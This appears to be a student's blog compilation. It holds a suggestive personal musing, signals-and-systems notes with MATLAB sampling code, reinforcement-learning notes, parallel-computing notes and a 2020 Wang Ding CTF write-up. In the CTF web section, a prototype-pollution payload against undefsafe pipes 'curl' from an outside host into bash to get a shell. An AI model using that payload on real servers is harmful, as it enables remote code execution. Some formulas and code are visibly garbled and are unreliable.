女装?女友?能力提升?——近日能力自我省察

image-20200517211412234

图片转自夜儿黑黑。 一个国外的牧羊犬。

和龙哥交流了一下他以前的“性趣”,大概知道了他是看什么长大的。希尔薇,一个从小开始养成的galgame,大概可以看出来,每一个宅男的内心都有迸发出来的猛虎,只是在长大的过程中把他们渐渐屏蔽。有的人无欲无求,但是否只是在迫害别人的一种手段。我就不得而知了。

程序在我面前现在成了一种可以玩弄的对象,可以说是一种男友式的媒介,我有在观察身边编程强大的人的思维路径,总结起来就是不要把手边的键盘当社畜,而是要向处理皮鞭一样对待,盘前的屏幕则是一个和男友谈话的工具,AC的瞬间就是高潮的时刻。这种时候,就无法自拔的对自己的精神、灵魂产生了别样的兴趣。

可能是养成类游戏在我脑海里已经被衍生出指数空间的并行世界。每一次,我都以女子之身占领了那个对手。

image-20200517212603850

要在别人向自己撒娇的时候产生怜悯之心。年轻而幼小的灵魂迂腐在沉寂的世界中,键盘链接血管再插入脑海的点滴,是悲欲得交欢。那份暧昧,无足轻重。

如何认证的提升编程能力,快速D

  1. 成为男女通吃的双性恋
  2. 成为老少皆宜的变态
  3. 成为持强凌弱且不足以被前者干掉的强者

最近沉浸在训练AI的过程中无法自拔,学了很多tuning的算法,SARSA,Q-Learning。很想在我的心里用一个我已有的算力训练一个女子。然后自己馋自己的身体。威颤本我和非我。HBO可以放出真心半解这种出圈出轨的三角恋。我在心里不断迭代自己的灵魂。

这和能力提升有什么关系呢?

我也不知道,只是多了些弱点。

清华智能体从来不用MCTS,而全是if else

龙哥居然用的是 if else 的贪心,看来操纵萝莉是几乎不能圆满的,总有一天是会被而克制的,龙哥拜倒在一位叫wenyi的女生的石榴裙下。

学会编程真的只要两年时间

我是花了2个月时间学会了如何fine tuning gpu cuda c/c++ 熟练任何平台的编译操作和一些基本的体系架构的。所以,再不济,一个高中毕业生,在完全没学过离散数学、编程的基础上,真的只要两年时间。这对于大多数人来说是非常幸运的,你仅需要这个时间,就可以在任何一家大公司,拿到一份不错的薪水。

但是,这样做真的好吗?我觉得不然。在行情好的当下,你学的东西很快就能down-to-earth的原因是大公司愿意培养你,可如果大公司某天没钱了,就不会费钱来培养你,而去选择需要单位时间产出性价比更高的博士生。所以,当你的青春不再,学不动东西的时候GG了。

我强烈不建议一个本科学的不是这个专业的去美国混个水硕就当程序员的。程序员需要长达2年实打实的煎熬。同时一定要做每门课的project,因为只有在完成project的过程中,才能更好的学会这个领域的每一个细节。learning by doing!

关于糖

过时不候。

[Signal and System] Filters & Bode Plot

Filters

category

低通(low-pass filter, LPF)
高通(high-pass filter, HPF)
带通(band-pass filter, BPF)
带止(band-stop filter, BSF)

We focus on low-pass filter, similar concepts and results hold for high-pass and band-pass filter.

Ideal low-pass filter: zero phase

image-20200512143142941image-20200512143158113image-20200512143220013

$$\begin{aligned}
h(t) &=\frac{1}{2 \pi} \int_{-\infty}{\infty} \mathrm{H}(j \omega) e{j \omega t} d \omega \
&=\frac{1}{2 \pi} \int_{-\omega_{c}}{\omega_{c}} 1 \cdot e{j \omega t} d \omega \
&=\left.\frac{1}{2 \pi} \cdot \frac{1}{j t} e^{j \omega t}\right|{-\omega{c}} ^{\omega_{c}} \
&=\frac{1}{2 \pi} \cdot \frac{1}{j t} \cdot 2 j \sin \left(\omega_{c} t\right) \
&=\frac{\sin \omega_{c} t}{\pi t}=\frac{\omega_{c}}{\pi} \operatorname{sinc}\left(\omega_{c} t\right) \
h(n) &=\frac{\sin \omega_{c} n}{\pi n}=\frac{\omega_{c}}{\pi} \operatorname{sinc}\left(\omega_{c} n\right)
\end{aligned}$$image-20200512144244246

\(s(t)=\int_{-\infty}^{t} h(\tau) d \tau\) image-20200512144147178

\(s(n)=\sum_{m=-\infty}^{n} h(m)\)image-20200512144216232

Ideal low-pass filter: linear phase

image-20200512144434500image-20200512144336101

rotate for \(-\alpha \omega\)

image-20200512144533776image-20200512144346387

Nonideal low-pass filter: frequencydomain

image-20200512144642077

  • Pass band: $0-\omega_{p}$, stop band: \(\omega>\omega_{s}\) transition: \(\omega_{s}-\omega_{p}\)
  • Pass-band ripple: \(\delta_{1}\), stop-band ripple: \(\delta_{2}\)Linear (nearly) linear phase over the passband is desirable.

Nonideal low-pass filter: timedomain

image-20200512144711418

  • Rise time: \(t_{r}\) overshoot: \(\Delta\)
  • Ringing frequency: \(\omega_{r}\) settling time: \(t_{s}\)

e.g. Nonideal low-pass filter

image-20200512144920810

  • Fifth-order Butterworth filter and a fifth-order elliptic filter
  • Same cutoff frequency
  • Same passband and stopband rippleThere's trade-off between time-domain characteristic \(t_{s}\) and fregurency domain characteristic \(\omega_{s}-\omega_{p}\)

Ideal vs. non-ideal filter

Gain.
  1. The ideal filter is fixed at a gain of 1 in the passband, which means that the input signal of the passband is "completely" passed, while the gain of the band is fixed at 0, which means that the input signal of the band is "completely" filtered out.
  2. The gain of a non-ideal filter is a function of frequency and not fixed.
Cut-off frequency.
  1. The ideal filter passband can be switched instantaneously between the stopband and the passband.
  2. The non-ideal filter cannot switch instantaneously between the passband and the stopband, its attenuation (gain) varies continuously with frequency, so there is a transition band, and the gain of the stopband cannot reach 0.

Bode Plot

The bode plot is for first and second-order CT system

First-order CT system

image-20200512145206265

$$\begin{aligned}
\text { Differential equation: } & C \frac{d y(t)}{d t}=\frac{x(t)-y(t)}{R} \
& \tau\left(\frac{d y(t)}{d t}\right)+y(t)=x(t), \tau=R C
\end{aligned}$$

$$\begin{aligned}
\text { Frequency response: } &\tau j \omega Y(j \omega)+Y(j \omega)=X(j \omega)\
&H(j \omega)=\frac{Y(j \omega)}{X(j \omega)}=\frac{1}{\underbrace{(j \omega \tau)+1}}_{\text {First order }}
\end{aligned}$$

Basic deduction

image-20200512145422064

image-20200512145432055

\(\tau:\) time constant
\(t=\tau, h(t)=1 /(\tau e)\)
\(s(t)=1-1 / e\) image-20200512145458290
\(\tau \downarrow, h(t)\) decays more sharply
\(s(t)\) rises more sharply

image-20200512145648470

The reason why for the image-20200512150206475 is they be approximated by the domain by the \([\frac1{10\tau},\frac{10}\tau]\) to \(-\frac4\pi[log_{10}(\omega\tau)+1]\)

Second-order CT system: differential equation

physical meaning

image-20200512145848225 image-20200512145903362

Frequency response \(\frac{d^{2} y(t)}{d t}+2 \zeta \omega_{n} \frac{d y(t)}{d t}+\omega_{n}^{2} y(t)=\omega_{n}^{2} x(t)\)

\[
\begin{array}{l}j \omega)^{2} Y(j \omega)+2 \zeta \omega_{n}(j \omega) Y(j \omega)+\omega_{n}^{2} Y(j \omega)=\omega_{n}^{2} X(j \omega) \\ H(j \omega)=\frac{\omega_{n}^{2}}{(j \omega)^{2}+2 \zeta \omega_{n}(j \omega)+\omega_{n}^{2}}\notag\end{array}
\]

image-20200512150651597image-20200512150705689

when \(\zeta>1\) the power is real, we can't apply Euler equation, just output the graph.

image-20200512150747787

some param difference in Bode

image-20200512151000940

image-20200512151016575

image-20200512151026188

image-20200512151040188

image-20200512151051914

image-20200512151101900

image-20200512151111391

implementation

image-20200512151154068

Reference

  1. Lecture Notes on Signals and Systems by Sascha Spors.[email protected]
  2. signal_system_dsp Alan V. Oppenheim

[Signal and System] Sampling of Signals

Ideal Sampling and Reconstruction

sampling theorem

If \(f(t)\) is a band-limited signal with a bandwidth of \(\omega_{m}\), the sampled spectrum \(F_{s}(\omega)\) of \(f(t)\) is the spectrum of \(f\). The spectrum \(F(\omega)\) is periodically extended on the frequency axis at intervals of the sampling frequency \(\omega_{s}\). Thus, when \(\omega_{s} \geq \omega_{m}\) frequency overlap does not occur; instead, it occurs when \(\omega_{s}<\omega_{m}\).

Model of Ideal Sampling

A continuous signal \(x(t)\) is sampled by taking its amplitude values at given time-instants. These time-instants can be chosen arbitrary in time, but most common are equidistant sampling schemes. The process of sampling is modeled by multiplying the continuous signal with a series of Dirac impulses. This constitutes an idealized model since Dirac impulses cannot be realized in practice.

For equidistant sampling of a continuous signal \(x(t)\) with sampling interval \(T\), the sampled signal \(x_\text{s}(t)\) reads

$$\begin{equation}
x_\text{s}(t) = \sum_{k = - \infty}{\infty} x(t) \cdot \delta(t - k T) = \sum_{k = - \infty}{\infty} x(k T) \cdot \delta(t - k T)
\end{equation}$$

where the multiplication property of the Dirac impulse was used for the last equality. The sampled signal is composed from a series of equidistant Dirac impulse which are weighted by the amplitude values of the continuous signal taken at their time-instants.

image-20200512114018147

The series of Dirac impulse is represented conveniently by the Dirac comb. Rewriting the sampled signal yields

$$\begin{equation}
x_\text{s}(t) = x(t) \cdot \frac{1}{T} {\bot !! \bot !! \bot} \left( \frac{t}{T} \right)
\end{equation}$$

The process of sampling can be modeled by multipyling the continuous signal \(x(t)\) with a Dirac comb. The samples \(x(k T)\) for \(k \in \mathbb{Z}\) of the continuous signal constitute the discrete (-time) signal \(x[k] := x(k T)\). The question arises if and under which conditions the samples \(x[k]\) fully represent the continuous signal and allow for a reconstruction of the analog signal. In order to investigate this, the spectrum of the sampled signal is derived.

Reconstruction

Ideal Reconstruction deduction

The question arises if and under which conditions the continuous signal can be recovered from the sampled signal. Above consideration revealed that the spectrum \(X_\text{s}(j \omega)\) of the sampled signal contains the unaltered spectrum of the continuous signal \(X(j \omega)\) if \(\omega_\text{u} < \frac{\omega_\text{s}}{2}\). Hence, the continuous signal can be reconstructed from the sampled signal by extracting the spectrum of the continuous signal from the spectrum of the sampled signal. This can be done by applying an ideal low-pass with cut-off frequency \(\omega_\text{c} = \frac{\omega_{s}}{2}\). This is illustrated in the following

image-20200512140938303

where the blue line represents the spectrum of the sampled signal and the red line the spectrum of the ideal low-pass. The transfer function \(H(j \omega)\) of the low-pass reads

$$\begin{equation}
H(j \omega) = T \cdot \text{rect} \left( \frac{\omega}{\omega_\text{s}} \right)
\end{equation}$$

Its impulse response \(h(t)\) is yielded by inverse Fourier transform of the transfer function

$$\begin{equation}
h(t) = \text{sinc} \left( \frac{\pi t}{T} \right)
\end{equation}$$

The reconstructed signal \(y(t)\) is given by convolving the sampled signal \(x_\text{s}(t)\) with the impulse response of the low-pass filter. This yields

$$\begin{align}
y(t) &= x_\text{s}(t) * h(t) \
&= \left( \sum_{k = - \infty}{\infty} x(k T) \cdot \delta(t - k T) \right) * \text{sinc} \left( \frac{\pi t}{T} \right) \
&= \sum_{k = - \infty}
{\infty} x(k T) \cdot \text{sinc} \left( \frac{\pi}{T} (t - k T) \right)
\end{align}$$

where for the last equality the fact was exploited that \(x(k T)\) is independent of the time \(t\) for which the convolution is performed. The reconstructed signal is given by a weighted superposition of shifted sinc functions. Their weights are given by the samples \(x(k T)\) of the continuous signal. The reconstruction is illustrated in the following figure

image-20200512140925658

The black boxes show the samples \(x(k T)\) of the continuous signal, the blue line the reconstructed signal \(y(t)\), the gray lines the weighted sinc functions. The sinc function for \(k = 0\) is highlighted in red. The amplitudes \(x(k T)\) at the sampled positions are reconstructed perfectly since

$$\begin{equation}
\text{sinc} ( \frac{\pi}{T} (t - k T) ) = \begin{cases}
\text{sinc}(0) = 1 & \text{for } t=k T \
\text{sinc}(n \pi) = 0 & \text{for } t=(k+n) T \quad , n \in \mathbb{Z} \notin {0}
\end{cases}
\end{equation}$$

The amplitude values in between the sampling positions \(t = k T\) are given by superimposing the shifted sinc functions. The process of computing values in between given sampling points is termed interpolation. The reconstruction of the sampled signal is performed by interpolating the discrete amplitude values \(x(k T)\). The sinc function is the optimal interpolator for band-limited signals.

Implementation

After the sampling we get the function \(f_{s}(t)\) passing the low-pass filter \(h(t)\) so,we get the reconstructed func \(f(t),\) which is:
\(f(t)=f_{s}(t) * h(t)\)
which we can deduct \(\quad f_{s}(t)=f(t) \sum_{-\infty}^{\infty} \delta\left(t-n T_{s}\right)=\sum_{-\infty}^{\infty} f\left(n T_{s}\right) \delta\left(t-n T_{s}\right)\)
\(h(t)=T_{s} \frac{\omega_{c}}{\pi} S a\left(\omega_{c} t\right)\)
Therefore,
$$\begin{aligned}
f(t) &=f_{s}(t) * h(t)=\sum_{-\infty}{\infty} f\left(n T_{s}\right) \delta\left(t-n T_{s}\right) * T_{s} \frac{\omega_{c}}{\pi} S a\left(\omega_{c} t\right) \
&=T_{s} \frac{\omega_{c}}{\pi} \sum_{-\infty}
{\infty} f\left(n T_{s}\right) \operatorname{Sa}\left[\omega_{c}\left(t-n T_{s}\right)\right]
\end{aligned}$$
The equation shows that, the equation can be reconstructed as infinity continuous series.

We select the signal \(f(t)=S a(t)\) as the sampled signal, which, when sampled at \(\omega_{s}=2 \omega_{m}\), is called pro
Boundary sampling. We take the ideal low-pass cutoff frequency \(\omega_{c}=\omega_{m}\) The following program implements the following for the signal \(f(t)=S a(t)\)
Sampling and reconstruction from that sampling signal recovery \(S a(t):\)

wm= 1;	%信号带宽
wc=wm;	%滤波器截止频率
Ts=pi/wm; 	%采样间隔
ws=2*pi/Ts;	%采样角频率.
n=-100:100;	%时域采样电数
nTs=n*Ts 	%时域采样点
f=sinc(nTs/pi); 
Dt=0.005;t=-15:Dt:15;
fa=f*Ts*wc/pi*sinc((wc/pi)*(ones(length(nTs),1)*t-nTs'*ones(1 ,length())); %信号重构
t1=-15:0.5:15;
f1 =sinc(t1/pi);
subplot(211); 
stem(t1,fl);
xlabel(kTs'); 
ylabel(f(kTs);
title('sa(t)=sinc(t/pi)的临界采样信号');
subplot(212);
plot(t,fa)
xlabel(t);
ylabel(fa(t); 
title('由sa(t)=sinc(t/pi)的临界采样信号重构sa(t)'); 
grid;

image-20200512140632694

Aliasing Reason

So far the case was discussed when no overlaps occur in the spectrum of the sampled signal. Hence when the upper frequency limit \(\omega_\text{u}\) of the real-valued low-pass signal is lower than \(\frac{\omega_\text{s}}{2}\). Here a perfect reconstruction of the continuous signal \(x(t)\) from its discrete counterpart \(x[k]\) is possible. However when this condition is not met, the repetitions of the spectrum of the continuous signal overlap. This is illustrated in the following

image-20200512141016176

In this case no perfect reconstruction of the continuous signal by low-pass filtering (interpolation) of the sampled signal is possible. The spectrum within the pass-band of the low-pass contains additional contributions from the repeated spectrum of the continuous signal. These contributions are known as aliasing. It becomes evident from above discussion of ideal reconstruction that the amplitude values are reconstructed correctly at the time-instants \(k T\). However, in between these time-instants the reconstructed signal \(y(t)\) differs from the sampled signal \(x(t)\) if aliasing is present.

Implementation

wm=1;
wc=1.1 *wm;
Ts=0.7*pi/wm;
ws= 2*pi/Ts;
n=- 100:100;
nTs=n*Ts
f=sinc(nTs/pi);
Dt=0.005;t=- 15:Dt:15;
fa=f* Ts*wc/pi* sinc((wc/pi)*(ones(length(nTs),1 )*t-nTs'*ones( 1,length(t))));
error=abs(fa-sinc(t/pi)); %重构信号与原信号误差
t1=-15:0.5:15;
fl=sinc(t1/pi);
subplot(311);
stem(t1,fl);
xlabel('kTs');
ylabel('f(kTs)');
title('sa(t)=sinc(t/pi)的采样信号');
subplot(312); 
plot(t,fa)
xlabel('t');
ylabel('fa(t)');
title('由sa(t)=sinc(t/pi)的过采样信号重构sa(t)');
grid;
subplot(313);
plot(t,error);
xlabel('t)');
ylabel('error()');
title('过采样信号与原信号的误差error(t)');

image-20200512141558411

summary

image-20200512113905574

!credit: bachelors module Signals and Systems, Communications Engineering, Universität Rostock.[email protected].

The order of sampling and quantization can be exchanged under the assumption that both are memoryless processes. Only digital signals can be handled by digital signal or general purpose processors. The sampling of signals is discussed as a first step towards a digital signal.

[RL] Monte-Carlo Methods

Monte-Carlo RL

  1. MC learn directly from episodes of experience.
  2. MC is model-free. No knowledge of MDP transitions or rewraeds.
  3. MC learns fro complete episodes. no bootstrapping
    1. Here Bootstrapping means Using one or more estimated values in the update step fro the same kind of estimated value.. like in \(SARSA(\lambda)\) or \(Q(\lambda)\)
    2. The single-step TD is to utilize the bootstrap by using a mix of results from different length trajectories.
  4. MC uses the simplest possible idea: value = mean return
  5. 2 ways:
    1. model-free: no model necessary and still attains optimality
    2. Simulated: needs only a simulation, not a full model
  6. Caveat: can only apply MC to episodic MDPs
    1. All episodes must terminate

policy evaluation

The goal is to learn \(v_\pi\) from episodes of experience under policy \(\pi\)
\[S_1,A_1,R_2,....S_k \sim 1\]
and the return is the total discounted reward: \(G_t=R_{t+1}+\gamma R_{t+2}+...\gamma ^{T-1}T_T\).

The value function is the expected return : \(v_\pi(x)=\mathbb{E}_{\pi}[G_t~S_t=s]\)
P.S. This policy use empirical mean rather than expected return.

By different visits during an episode, they can be diverged into Every-Visit and First-visit, and both converge asymptotically.

First-visit

proof of convergence


In fact it's the "backward mean \(\frac{S(s)}{N(s)}\)" to update \(V(s)\)

blackjack (21 points)

In Sutton's book, we get the exploration graph like

Every-Visit Monte-Carlo Policy Evaluation

the difference is every visits.

Incremental Mean

The mean \(\mu_1,\mu_2.... \) of the sequent can be computed incrementally by

incremental MC-updates

Monte-Carlo Estimation of Action Values

Backup Diagram for Monte-Carlo

Similar to Bandit, is to find optimal from the explore/exploit dilemma the entire rest of episode included. and the only choice considered is at each state and doesn't bootstrap.(unlike DP).

Time required to estimate one state does not depend onthe total number of states

Temporal-Difference Learning

Bootstrapping

Saying: To lift one up, strap the boot of sb. again and again which is incompletable.

Modern definition: re-sampling technique from the same sample again and again which has the statistical meaning.

intro

  1. TD methods learn directly from episodes of experience
  2. TD is model-free:no knowledge of MDP transitions/rewards
  3. TD learns from incomplete episodes, by bootstrapping
  4. TD updates a guess towards a guess

\((number)\) the number represent the look ahead times.

driving home example

TD is more flexible for MC have to wait for the final result for the update. On policy vs. off policy.




MC make a nearest prediction


We actually can generate the estimated MDP graph and corresponding example for AB example.

Comparison

  1. TD can learn before knowing the final outcome
    1. TD can learn online after every step (less memory & peak computation)
    2. MC must wait until end of episode before return is known
  2. TD can learn without the final outcome
    1. TD can learn from incomplete sequences
    2. MC can only learn from complete sequences
    3. TD works in continuing (non-terminating) environments
    4. MC only works for episodic (terminating) environment
      ### result is TD performs better in random walk


batch MC and TD

add step parameter \(\alpha\)

Unified comparison

\(\to\)

  • Bootstrapping: update involves an estimate
    • MC does not bootstrap
    • DP bootstraps
    • TD bootstraps
  • Sampling:update samples an expectation
    • MC samples
    • DP does not sample
    • TD samples

n-step TD

⁃   $

\begin{array}{l}\text { n-Step Return } \ \qquad \begin{aligned} \text { Consider the following } n \text { -step returns for } n=1,2, \infty \ \qquad \begin{aligned} n=1 &(T D) & \frac{G_{t}{(1)}}{G_{t}{(2)}}=\frac{R_{t+1}+\gamma V\left(S_{t+1}\right)}{R_{t+1}+\gamma R_{t+2}+\gamma{2} V\left(S_{t+2}\right)} \ & \vdots \end{aligned} \ \qquad n=\infty \quad(M C) \quad G_{t}{(\infty)}=R_{t+1}+\gamma R_{t+2}+\ldots \gamma{T-1} R_{T} \end{aligned} \ \text { - Define the } n \text { -step return } \ \qquad \underbrace{G_{t}{(n)}=R_{t+1}+\gamma R_{t+2}+\ldots+\gamma{n-1} R_{t+n}+\gamma{n} V\left(S_{t+n}\right)}_{The\ General\ case}\ \text { - n} \text { -step temporal-difference learning } \ \qquad V\left(S_{t}\right) \leftarrow V\left(S_{t}\right)+\alpha\left(G_{t}{(n)}-V\left(S_{t}\right)\right)\end{array}
$$

Reference

  1. What exactly is bootstrapping in reinforcement learning?
  2. First-visit Monte Carlo policy from WSU

Reflection on our 2020 Wang Ding CTF contest

Result

image-20200510230838571

The sunshine will eventually come without doubt tomorrow!

Misc

qiandao

Get the robots.txt from the nginx website and get the destination.

image-20200510231822195

Play the game with gourgeous names in the CTF conf.

image-20200510231813046

Flag in "F12"

image-20200510231804937

Reverse

signal

credit: https://bbs.pediy.com/thread-259429.htm

image-20200510232648046

not happy, it's a vm inside. From vm_operad, we have

image-20200510232802184

image-20200510232837945

The key is case7, we can apply the diction on a1[v10+1] to figure out what happens. So, up the OD.

Appling the table

int table[] = { 0x0A, 4, 0x10, 3, 5, 1, 4, 0x20, 8, 5, 3, 1, 3, 2, 0x8, 0x0B, 1, 0x0C, 8, 4, 4, 1, 5, 3, 8, 3, 0x21, 1, 0x0B, 8, 0x0B, 1, 4, 9, 8, 3, 0x20, 1, 2, 0x51, 8, 4, 0x24, 1, 0x0C, 8, 0x0B, 1, 5, 2, 8, 2, 0x25, 1, 2, 0x36, 8, 4, 0x41, 1, 2, 0x20, 8, 5, 1, 1, 5, 3, 8, 2, 0x25, 1, 4, 9, 8, 3,0x20, 1, 2, 0x41,8, 0x0C, 1, 7,0x22, 7, 0x3F, 7,0x34, 7, 0x32, 7,0x72, 7, 0x33, 7,0x18, 7, 0xA7, 0xFF, 0xFF, 0xFF, 7,0x31, 7, 0xF1, 0xFF, 0xFF,0xFF, 7, 0x28, 7, 0x84, 0xFF,0xFF, 0xFF, 7, 0xC1, 0xFF, 0xFF, 0xFF, 7,0x1E, 7, 0x7A };

We discover the value of a1[v10+1] stays the same.

We can deduct that case 8's to read the user's input, and make the handler as the vector handler in the OS.

the handler can be enumerated as

10h ^ v8[1]-5 = 22h
(20h ^v8[2])*3=3Fh
v8[3]-2-1=34h
(v8[4]+1 )^4 =32 h
v8[5]*3-21h=72h
v8[6]-1-1=33h
9^v8[7]-20=18
(51h +v8[8])^24h=FA7
v8[9]+1-1=31h
2*v8[10]+25h=F1h
(36h+v8[11]) ^41h =28h
(20h + v8[12])*1=F84h
3*v8[13]+25h=C1h
9^v8[14]-20h=1E h
41h + v8[15] +1 =7A h

Eventually we get the total flag{757515121f3d478}.

Web

Notes

image-20200510231219939

get the webshell from the logic in the js.

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

Apply the "中国菜刀" payloads id=__proto__.abc&author=curl%20http://gem-love.com:12390/shell.txt|bash&raw=a in the undefsafe.

get the code from /var/html/code/flag

flag{ 8c46c34a-fa1f-4fc9- 81bd- 609b1aafff8a }

Crypto

boom

image-20200510231932335

just play a simple game

image-20200510231952896

md5:en5oy

image-20200510232016920

stupid z=31,y=68, x=74

image-20200510232038249

stupid Mathemetica.

image-20200510232104887

You Raise Me up

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

n = 2 ** 512
m = random.randint(2, n-1) | 1
c = pow(m, bytes_to_long(flag), n)
print 'm = ' + str(m)
print 'c = ' + str(c)

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499

What you need to do is to calculate the \(m^f\equiv c\ mod\ n\)

\(n\) is actually $2^512$.

just another Modular arithmetic like "点鞭炮", which can be searched on stackoverflow.

Reflection

We have to practice more and collaborate more!

[Parallel Computing] Loop dependence analysis

Intro

shared memory algorithm design

image-20200505182020225

For non-shared memory algorithms, we have to utilize bararrier to gain data transformed.

image-20200505182116133

for shared memory database algorithm, we have to decide the group part of the task that shared memory a lot . Then just apply the inserting directives of omp or mpi

Design considerations

two main considerations lies in data dependence and load balance so we have to apply the following steps

  • data dependence analysis
  • static r dynamic and block r cyclic work assignment
  • variable specification whether using shared private r reduction and row-wise r column-wise
    • shared variables cause cache coherence traffic and much lower performance
    • private and reduction variables don't need synchronization
    • dimension mapping is more relying on the cache locality

Main Consideration for data dependence analysis

RAW & WAR & WAW

all the collations should be avoided though they might run into right situations

Goal is to we should run all the dependent situation on the same processor.

loop dependence analysis

  • loop-carried dependence
    • dependence exists across different iterations of loop
  • loop-independent dependence
    • dependence exists within the same iteration of loop

example

image-20200505191450951

iteration-space traversal graph (ITG)

  • iteration-space traversal graph is a line graph showing the order of traversal in the iteration space.
  • image-20200505192641248

loop-carried dependence graph (LDG)

  • Given the ITG, can determine the dependence between different loops.
  • Loop-carried Dependence Graph (LDG) shows the loopcarried true/anti/output dependence relationships.
  • Node in LDG is a point in the iteration space.
  • Directed edge in LDG is the dependence.
  • LDG helps identify parts of the loop that can be done in parallel.

examples

image-20200505193459997
image-20200505193641884
image-20200505193657284
image-20200505194356931
image-20200505194556118

 

Distance and direction vector

image-20200505194745834
image-20200505195031615

Loop

image-20200505195226568
image-20200505195950287
image-20200505204740523
image-20200505204811678

Algorithm analysis

image-20200505205040713